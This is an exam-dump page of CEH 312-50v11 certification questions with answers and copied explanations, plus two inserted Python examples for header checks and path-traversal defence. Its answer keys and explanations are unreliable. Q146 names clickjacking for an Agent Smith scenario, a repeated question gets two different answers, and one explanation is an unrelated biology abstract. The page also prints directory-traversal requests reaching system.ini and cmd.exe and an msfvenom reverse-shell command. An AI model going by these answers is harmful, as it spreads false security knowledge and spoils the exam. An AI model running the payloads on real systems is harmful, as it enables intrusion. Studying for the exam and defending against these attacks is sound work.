Jan-2022 EC-COUNCIL 312-50v11 Actual Questions and 100% Cover Real Exam Questions [Q146-Q161]


312-50v11 Free Exam Questions & Answers PDF Updated on Jan-2022

NEW QUESTION 146
Don, a student, came across a gaming app in a third-party app store and installed it. Subsequently, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after installing the app. What is the attack performed on Don in the above scenario?

  • A. Clickjacking
  • B. SMS phishing attack
  • C. Agent Smith attack
  • D. SIM card attack

Answer: A

Explanation:
Clickjacking is an attack that tricks a user into clicking a webpage element which is invisible or disguised as another element. This can cause users to unwittingly download malware, visit malicious sites, provide credentials or sensitive information, transfer money, or purchase products online.
Typically, clickjacking is performed by displaying an invisible page or HTML element, inside an iframe, on top of the page the user sees. The user believes they are clicking the visible page, but they are actually clicking an invisible element in the additional page transposed on top of it.
The invisible page might be a malicious page, or a legitimate page the user did not intend to visit, for instance a page on the user's banking site that authorizes the transfer of money.
There are several variations of the clickjacking attack, such as:
* Likejacking - a technique in which the Facebook "Like" button is manipulated, causing users to "like" a page they did not intend to like.
* Cursorjacking - a UI redressing technique that changes the cursor from the position the user perceives to a different position. Cursorjacking relies on vulnerabilities in Flash and the Firefox browser, which have now been fixed.

Clickjacking attack example
1. The attacker creates an attractive page which promises to offer the user a free trip to Tahiti.
2. In the background the attacker checks if the user is logged into his banking site and if so, loads the screen that permits transfer of funds, using query parameters to insert the attacker's bank details into the form.
3. The bank transfer page is displayed in an invisible iframe above the free gift page, with the "Confirm Transfer" button exactly aligned over the "Receive Gift" button visible to the user.
4. The user visits the page and clicks the "Book My Free Trip" button.
5. In reality the user is clicking on the invisible iframe, and has clicked the "Confirm Transfer" button. Funds are transferred to the attacker.
6. The user is redirected to a page with information about the free gift (not knowing what happened in the background).
This example illustrates that, in a clickjacking attack, the malicious action (on the bank website, in this case) cannot be traced back to the attacker because the user performed it while being legitimately signed into their own account.

Clickjacking mitigation
There are two general ways to defend against clickjacking:
* Client-side methods - the most common is called Frame Busting. Client-side methods can be effective in some cases, but are not considered a best practice, because they can be easily bypassed.
* Server-side methods - the most common is X-Frame-Options. Server-side methods are recommended by security experts as an effective way to defend against clickjacking.
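
The server-side defence named above can be checked mechanically. The following is an added example, not part of the original page: it classifies a response's anti-framing policy from its headers and adds a policy where none exists. It also covers the Content-Security-Policy frame-ancestors directive, which the page does not mention; the function names and every header value are constructed for illustration.

```python
# Added example, not from the original page. All header values are constructed.

def frame_ancestors(headers):
    """Return the source list of the first CSP frame-ancestors directive, or None."""
    for name, value in headers:
        if name.lower() != "content-security-policy":
            continue
        for directive in value.split(";"):
            parts = directive.split()
            if parts and parts[0].lower() == "frame-ancestors":
                return [p.lower() for p in parts[1:]]
    return None


def framing_verdict(headers):
    """Classify who may frame a response: blocked, same-origin, allow-list, frameable."""
    sources = frame_ancestors(headers)
    if sources is not None:
        # Browsers that honour frame-ancestors ignore X-Frame-Options when it is set.
        if sources in ([], ["'none'"]):
            return "blocked"
        if sources == ["'self'"]:
            return "same-origin"
        return "frameable" if "*" in sources else "allow-list"
    values = set()
    for name, value in headers:
        if name.lower() == "x-frame-options":
            values.update(v.strip().lower() for v in value.split(","))
    values.discard("")
    if len(values) > 1 and values & {"deny", "sameorigin", "allowall"}:
        return "blocked"  # conflicting values: the HTML Standard refuses to render
    if values == {"deny"}:
        return "blocked"
    if values == {"sameorigin"}:
        return "same-origin"
    return "frameable"  # missing, invalid, or obsolete ALLOW-FROM: no protection


def harden(headers, same_origin=False):
    """Return a copy of headers with X-Frame-Options and frame-ancestors set.

    An existing frame-ancestors directive is left alone so its owner can review it.
    """
    xfo, csp = ("SAMEORIGIN", "frame-ancestors 'self'") if same_origin \
        else ("DENY", "frame-ancestors 'none'")
    kept = [(n, v) for n, v in headers if n.lower() != "x-frame-options"]
    if frame_ancestors(kept) is None:
        kept.append(("Content-Security-Policy", csp))
    kept.append(("X-Frame-Options", xfo))
    return kept


# Constructed sample responses for a hypothetical "confirm transfer" page.
SAMPLES = {
    "no headers": [("Content-Type", "text/html")],
    "obsolete ALLOW-FROM": [("X-Frame-Options", "ALLOW-FROM https://partner.example")],
    "XFO deny": [("X-Frame-Options", "DENY")],
    "CSP self": [("Content-Security-Policy", "default-src 'self'; frame-ancestors 'self'")],
    "CSP wildcard beats XFO": [("X-Frame-Options", "SAMEORIGIN"),
                               ("Content-Security-Policy", "frame-ancestors *")],
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(f"{label:24} {framing_verdict(hdrs):12} -> {framing_verdict(harden(hdrs))}")
```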

 

NEW QUESTION 147
Sam, a professional hacker, targeted an organization with intention of compromising AWS IAM credentials. He attempted to lure one of the employees of the organization by initiating fake calls while posing as a legitimate employee. Moreover, he sent phishing emails to steal the AWS IAM credentials and further compromise the employee's account. What is the technique used by Sam to compromise the AWS IAM credentials?

  • A. Reverse engineering
  • B. Password reuse
  • C. Insider threat
  • D. Social engineering

Answer: D

Explanation:
Just like any other service that accepts usernames and passwords for logging in, AWS users are vulnerable to social engineering attacks from attackers. Fake emails, calls, or any other method of social engineering may end up with an AWS user's credentials in the hands of an attacker.
If a user only uses API keys for accessing AWS, general phishing techniques could still be used to gain access to other accounts or their computer itself, where the attacker may then pull the API keys for the aforementioned AWS user.
With basic open-source intelligence (OSINT), it's usually simple to collect a list of employees of an organization that use AWS on a regular basis. This list can then be targeted with spear phishing to try to gather credentials. A simple technique may include an email that says your bill has spiked 500% within the past 24 hours, "click here for additional information", and when they click the link, they are forwarded to a malicious copy of the AWS login page designed to steal their credentials.
An example of such an email can be seen in the screenshot below. It looks exactly like an email that AWS would send to you if you were to exceed the free tier limits, except for a few small changes. If you clicked on any of the highlighted regions in the screenshot, you would not be taken to the official AWS website and you would instead be forwarded to a fake login page set up to steal your credentials.
These emails can get even more specific by performing a little additional OSINT before sending them out. If an attacker was able to discover your AWS account ID online somewhere, they could use methods we at Rhino have released previously to enumerate what users and roles exist in your account without any logs showing up on your side. They could use this list to further refine their target list, as well as their emails to reference services they may know that you often use.
For reference, the blog post for using AWS account IDs for role enumeration can be found here and the blog post for using AWS account IDs for user enumeration can be found here.
During engagements at Rhino, we find that phishing is one of the fastest ways for us to gain access to an AWS environment.

 

NEW QUESTION 148
John is investigating web-application firewall logs and observes that someone is attempting to inject the following:
char buff[10];
buff[10] = 'a';
What type of attack is this?

  • A. SQL injection
  • B. XSS
  • C. Buffer overflow
  • D. CSRF

Answer: C

Explanation:
A buffer overflow is an anomaly that happens when software writing data to a buffer overflows the buffer's capacity, resulting in adjacent memory locations being overwritten. In other words, too much information is being passed into a container that does not have enough space, and that information ends up replacing data in adjacent containers. Buffer overflows can be exploited by attackers with a goal of modifying a computer's memory in order to undermine or take control of program execution.

What's a buffer?
A buffer, or data buffer, is an area of physical memory storage used to temporarily store data while it is being moved from one place to another. These buffers typically live in RAM. Computers frequently use buffers to help improve performance; modern hard drives take advantage of buffering to efficiently access data, and many online services also use buffers. For example, buffers are frequently used in online video streaming to prevent interruption. When a video is streamed, the video player downloads and stores perhaps 20% of the video at a time in a buffer and then streams from that buffer. This way, minor drops in connection speed or quick service disruptions won't affect the video stream performance.
Buffers are designed to contain specific amounts of data. Unless the program utilizing the buffer has built-in instructions to discard data when too much is sent to the buffer, the program will overwrite data in memory adjacent to the buffer.
Buffer overflows can be exploited by attackers to corrupt software. Despite being well-understood, buffer overflow attacks are still a serious security problem that torments cyber-security teams. In 2014 a threat referred to as 'Heartbleed' exposed many users to attack due to a buffer overflow vulnerability in SSL software.

How do attackers exploit buffer overflows?
An attacker can deliberately feed a carefully crafted input into a program that will cause the program to try to store that input in a buffer that isn't large enough, overwriting portions of memory connected to the buffer space. If the memory layout of the program is well-defined, the attacker can deliberately overwrite areas known to contain executable code. The attacker can then replace this code with their own executable code, which can drastically change how the program is meant to work.
For example, if the overwritten part in memory contains a pointer (an object that points to a different place in memory), the attacker's code could replace that code with another pointer that points to an exploit payload. This can transfer control of the entire program over to the attacker's code.

 

NEW QUESTION 149
Attacker Lauren has gained the credentials of an organization's internal server system, and she was often logging in during irregular times to monitor the network activities. The organization was skeptical about the login times and appointed security professional Robert to determine the issue. Robert analyzed the compromised device to find incident details such as the type of attack, its severity, target, impact, method of propagation, and vulnerabilities exploited. What is the incident handling and response (IH&R) phase, in which Robert has determined these issues?

  • A. Incident recording and assignment
  • B. Incident triage
  • C. Eradication
  • D. Preparation

Answer: A

 

NEW QUESTION 150
While testing a web application in development, you notice that the web server does not properly ignore the
"dot dot slash" (../) character string and instead returns the file listing of a folder structure of the server.
What kind of attack is possible in this scenario?

  • A. Denial of service
  • B. SQL injection
  • C. Cross-site scripting
  • D. Directory traversal

Answer: D

Explanation:
Properly controlling access to web content is crucial for running a secure web server. Directory traversal, or Path Traversal, is an HTTP attack which allows attackers to access restricted directories and execute commands outside of the web server's root directory.
Web servers provide two main levels of security mechanisms:
* Access Control Lists (ACLs)
* Root directory
An Access Control List is used in the authorization process. It is a list which the web server's administrator uses to indicate which users or groups are able to access, modify or execute particular files on the server, as well as other access rights.
The root directory is a specific directory on the server file system to which users are confined. Users are not able to access anything above this root.
For example: the default root directory of IIS on Windows is C:\Inetpub\wwwroot and with this setup, a user does not have access to C:\Windows but has access to C:\Inetpub\wwwroot\news and any other directories and files under the root directory (provided that the user is authenticated via the ACLs).
The root directory prevents users from accessing any files on the server such as C:\WINDOWS/system32/win.ini on Windows platforms and the /etc/passwd file on Linux/UNIX platforms.
This vulnerability can exist either in the web server software itself or in the web application code.
To perform a directory traversal attack, all an attacker needs is a web browser and some knowledge of where to blindly find any default files and directories on the system.

What an attacker can do if your site is vulnerable
With a system vulnerable to directory traversal, an attacker can make use of this vulnerability to step out of the root directory and access other parts of the file system. This might give the attacker the ability to view restricted files, which could provide the attacker with more information required to further compromise the system.
Depending on how the website access is set up, the attacker will execute commands by impersonating the user associated with "the website". Therefore it all depends on what the website user has been given access to in the system.

Example of a Directory Traversal attack via web application code
In web applications with dynamic pages, input is usually received from browsers through GET or POST request methods. Here is an example of an HTTP GET request URL:
GET http://test.webarticles.com/show.asp?view=oldarchive.html HTTP/1.1
Host: test.webarticles.com
With this URL, the browser requests the dynamic page show.asp from the server and with it also sends the parameter view with the value of oldarchive.html. When this request is executed on the web server, show.asp retrieves the file oldarchive.html from the server's file system, renders it and then sends it back to the browser which displays it to the user. The attacker would assume that show.asp can retrieve files from the file system and sends the following custom URL.
GET http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1
Host: test.webarticles.com
This will cause the dynamic page to retrieve the file system.ini from the file system and display it to the user.
The expression ../ instructs the system to go one directory up which is commonly used as an operating system directive. The attacker has to guess how many directories he has to go up to find the Windows folder on the system, but this is easily done by trial and error.

Example of a Directory Traversal attack via web server
Apart from vulnerabilities in the code, even the web server itself can be open to directory traversal attacks. The problem can either be incorporated into the web server software or inside some sample script files left available on the server.
The vulnerability has been fixed in the latest versions of web server software, but there are web servers online which are still using older versions of IIS and Apache which might be open to directory traversal attacks. Even though you might be using a web server software version that has fixed this vulnerability, you might still have some sensitive default script directories exposed which are well known to hackers.
For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute a command can be:
GET http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\ HTTP/1.1
Host: server.com
The request would return to the user a list of all files in the C:\ directory by executing the cmd.exe command shell file and run the command dir c:\ in the shell. The %5c expression that is in the URL request is a web server escape code which is used to represent normal characters. In this case %5c represents the character \.
Newer versions of modern web server software check for these escape codes and do not let them through.
Some older versions however, do not filter out these codes in the root directory enforcer and will let the attackers execute such commands.
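
A defensive counterpart to the show.asp requests above, added here as an illustration and not taken from the original page: the handler canonicalizes the requested name against the root directory before touching the file system, and refuses anything that resolves outside it. WEB_ROOT, the function names and the sample URLs beyond the two quoted on the page are assumptions made for the example.

```python
# Added example, not from the original page. Paths and URLs are constructed.
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/srv/www/articles"  # assumed root directory for the show.asp content


def view_from_url(url):
    """Extract the single `view` parameter; parse_qs percent-decodes it once."""
    values = parse_qs(urlsplit(url).query).get("view", [])
    return values[0] if len(values) == 1 else None


def resolve_view(value, root=WEB_ROOT):
    """Map a decoded `view` value to a path under root, or None if refused."""
    if value is None or "\x00" in value:
        return None
    # A value that still changes when decoded again was double-encoded
    # (or never decoded) to slip escape codes such as %5c past a filter.
    if unquote(value) != value:
        return None
    # Treat the Windows separator as a separator, so "..\" is seen as "../".
    candidate = value.replace("\\", "/")
    if re.match(r"^[A-Za-z]:", candidate):  # drive-letter absolute path
        return None
    # Collapse "." and ".." segments; an absolute candidate replaces root here.
    full = posixpath.normpath(posixpath.join(root, candidate))
    # Compare whole path components, not string prefixes, so that
    # "/srv/www/articles-private" does not pass as being under the root.
    if full == root or posixpath.commonpath([root, full]) != root:
        return None
    # This check is lexical. On a real file system, also resolve symbolic
    # links (os.path.realpath) and repeat the comparison before opening.
    return full


def handle(url):
    """Return the file show.asp may serve for this request URL, or None."""
    return resolve_view(view_from_url(url))


# Constructed requests: the first two are the ones quoted in the text.
REQUESTS = [
    "http://test.webarticles.com/show.asp?view=oldarchive.html",
    "http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini",
    "http://test.webarticles.com/show.asp?view=..%5c..%5cWindows%5csystem.ini",
    "http://test.webarticles.com/show.asp?view=..%252f..%252fetc%252fpasswd",
    "http://test.webarticles.com/show.asp?view=../articles-private/notes.txt",
]

if __name__ == "__main__":
    for request in REQUESTS:
        print(handle(request) or "REFUSED", "<-", request)
```

The same canonicalize-then-compare step belongs in the web server's own path handling, which is where the scripts-directory request shown above has to be stopped.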

 

NEW QUESTION 151
A large company intends to use Blackberry for corporate mobile phones and a security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the corporate network. What tool should the analyst use to perform a Blackjacking attack?

  • A. Blooover
  • B. Paros Proxy
  • C. BBCrack
  • D. BBProxy

Answer: D

 

NEW QUESTION 152
Nicolas just found a vulnerability on a public-facing system that is considered a zero-day vulnerability. He sent an email to the owner of the public system describing the problem and how the owner can protect themselves from that vulnerability. He also sent an email to Microsoft informing them of the problem that their systems are exposed to. What type of hacker is Nicolas?

  • A. White hat
  • B. Gray hat
  • C. Black hat
  • D. Red hat

Answer: A

Explanation:
A white hat (or a white hat hacker) is an ethical computer hacker, or a computer security expert, who focuses on penetration testing and on other testing methodologies that ensure the security of an organization's information systems. Ethical hacking is a term meant to imply a broader category than just penetration testing. Contrasted with black hat, a malicious hacker, the name comes from Western films, where heroic and antagonistic cowboys might traditionally wear a white and a black hat respectively. While a white hat hacker hacks under good intentions with permission, and a black hat hacker, most often unauthorized, has malicious intent, there is a third kind known as a gray hat hacker who hacks with good intentions but sometimes without permission. White hat hackers may also work in teams called "sneakers and/or hacker clubs", red teams, or tiger teams.
While penetration testing concentrates on attacking software and computer systems from the start (scanning ports, examining known defects in protocols and applications running on the system and patch installations, for example), ethical hacking may include other things. A full-blown ethical hack might include emailing staff to ask for password details, searching through executives' dustbins and usually breaking and entering, without the knowledge and consent of the targets. Only the owners, CEOs and Board Members (stakeholders) who asked for a security review of this magnitude are aware. To try to replicate some of the destructive techniques a real attack might employ, ethical hackers may arrange for cloned test systems, or organize a hack late at night while systems are less critical. In most recent cases these hacks perpetuate for the long-term con (days, if not weeks, of long-term human infiltration into an organization).
Some examples include leaving USB/flash key drives with hidden auto-start software in a public area as if someone lost the small drive and an unsuspecting employee found it and took it. Some other methods of carrying these out include:
* DoS attacks
* Social engineering tactics
* Reverse engineering
* Network security
* Disk and memory forensics
* Vulnerability research
* Security scanners such as:
  - W3af
  - Nessus
  - Burp suite
* Frameworks such as:
  - Metasploit
* Training Platforms
These methods identify and exploit known security vulnerabilities and attempt to evade security to gain entry into secured areas. They are able to do this by hiding software and system 'back-doors' that can be used as a link to information or access that a non-ethical hacker, also known as 'black-hat' or 'grey-hat', may want to reach.

 

NEW QUESTION 153
Which of the following is a command line packet analyzer similar to GUI-based Wireshark?

  • A. jack the ripper
  • B. nessus
  • C. ethereal
  • D. tcpdump

Answer: D

 

NEW QUESTION 154
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the information, he successfully performed an attack on the target government organization without being traced.
Which of the following techniques is described in the above scenario?

  • A. VPN footprinting
  • B. Website footprinting
  • C. VoIP footprinting
  • D. Dark web footprinting

Answer: A

 

NEW QUESTION 155
While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption, "Learn more about your friends!", as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A few days later, Matt's bank account has been accessed, and the password has been changed. What most likely happened?

  • A. Matt inadvertently provided his password when responding to the post.
  • B. Matt inadvertently provided the answers to his security questions when responding to the post.
  • C. Matt's computer was infected with a keylogger.
  • D. Matt's bank-account login information was brute forced.

Answer: B

 

NEW QUESTION 156
What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?

  • A. msfvenom -p windows/rneterpreter/reverse_tcpRMOST=i0.i 0.10.30 LPORT =4444-fc
  • B. msfvenom -p windows/meterpreier/feversetcp LHOST=10.10.10.30 LP0RT=4444-f c
  • C. msfvenom -p wlndows/meterpreter/reverse.tcp lhost=io.i 0.1030 lport=4444 -f exe > shell.exe
  • D. msfvenom -p windows/meterpreter/reverse_tcp RHOST= 10.10.10.30 LPORT=4444 -f.exe > shell.exe

Answer: D

 

NEW QUESTION 157
Jacob works as a system administrator in an organization. He wants to extract the source code of a mobile application and disassemble the application to analyze its design flaws. Using this technique, he wants to fix any bugs in the application, discover underlying vulnerabilities, and improve defense strategies against attacks.
What is the technique used by Jacob in the above scenario to improve the security of the mobile application?

  • A. App sandboxing
  • B. Reverse engineering
  • C. Jailbreaking
  • D. Social engineering

Answer: B

 

NEW QUESTION 158
An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization's machines to detect which ports are attached to services such as an email server, a web server or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario?

  • A. Product-based solutions
  • B. Tree-based assessment
  • C. Inference-based assessment
  • D. Service-based solutions

Answer: D

Explanation:
As systems approaches to the development of biological models become more mature, attention is increasingly focusing on the problem of inferring parameter values within those models from experimental data. However, particularly for nonlinear models, it is not obvious, either from inspection of the model or from the experimental data, that the inverse problem of parameter fitting will have a unique solution, or even a non-unique solution that constrains the parameters to lie within a plausible physiological range. Where parameters cannot be constrained they are termed 'unidentifiable'. We focus on gaining insight into the causes of unidentifiability using inference-based methods, and compare a recently developed measure-theoretic approach to inverse sensitivity analysis to the popular Markov chain Monte Carlo and approximate Bayesian computation techniques for Bayesian inference. All three approaches map the uncertainty in quantities of interest in the output space to the probability of sets of parameters in the input space. The geometry of these sets demonstrates how unidentifiability can be caused by parameter compensation and provides an intuitive approach to inference-based experimental design.

 

NEW QUESTION 159
John is investigating web-application firewall logs and observes that someone is attempting to inject the following:
char buff[10];
buff[10] = 'a';
What type of attack is this?

  • A. XSS
  • B. SQL injection
  • C. Buffer overflow
  • D. CSRF

Answer: B

Explanation:
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.
In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.

What is the impact of a successful SQL injection attack?
A successful SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period.

SQL injection examples
There is a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:
* Retrieving hidden data, where you can modify an SQL query to return additional results.
* Subverting application logic, where you can change a query to interfere with the application's logic.
* UNION attacks, where you can retrieve data from different database tables.
* Examining the database, where you can extract information about the version and structure of the database.
* Blind SQL injection, where the results of a query you control are not returned in the application's responses.

 

NEW QUESTION 160
These hackers have limited or no training and know how to use only basic techniques or tools.
What kind of hackers are we talking about?

  • A. Black-Hat Hackers
  • B. White-Hat Hackers
  • C. Gray-Hat Hacker
  • D. Script Kiddies

Answer: D

Explanation:
Script Kiddies: These hackers have limited or no training and know how to use only basic techniques or tools. Even then they may not understand any or all of what they are doing.

 

NEW QUESTION 161
......


Audiences that Can Aim at 312-50v11

Consider investing time and effort in the EC-Council 312-50v11 exam only if your work involves penetration testing, vulnerability testing, and the like. Specialists such as auditors, security officers, site administrators, and security staff will also benefit greatly from this exam.

 
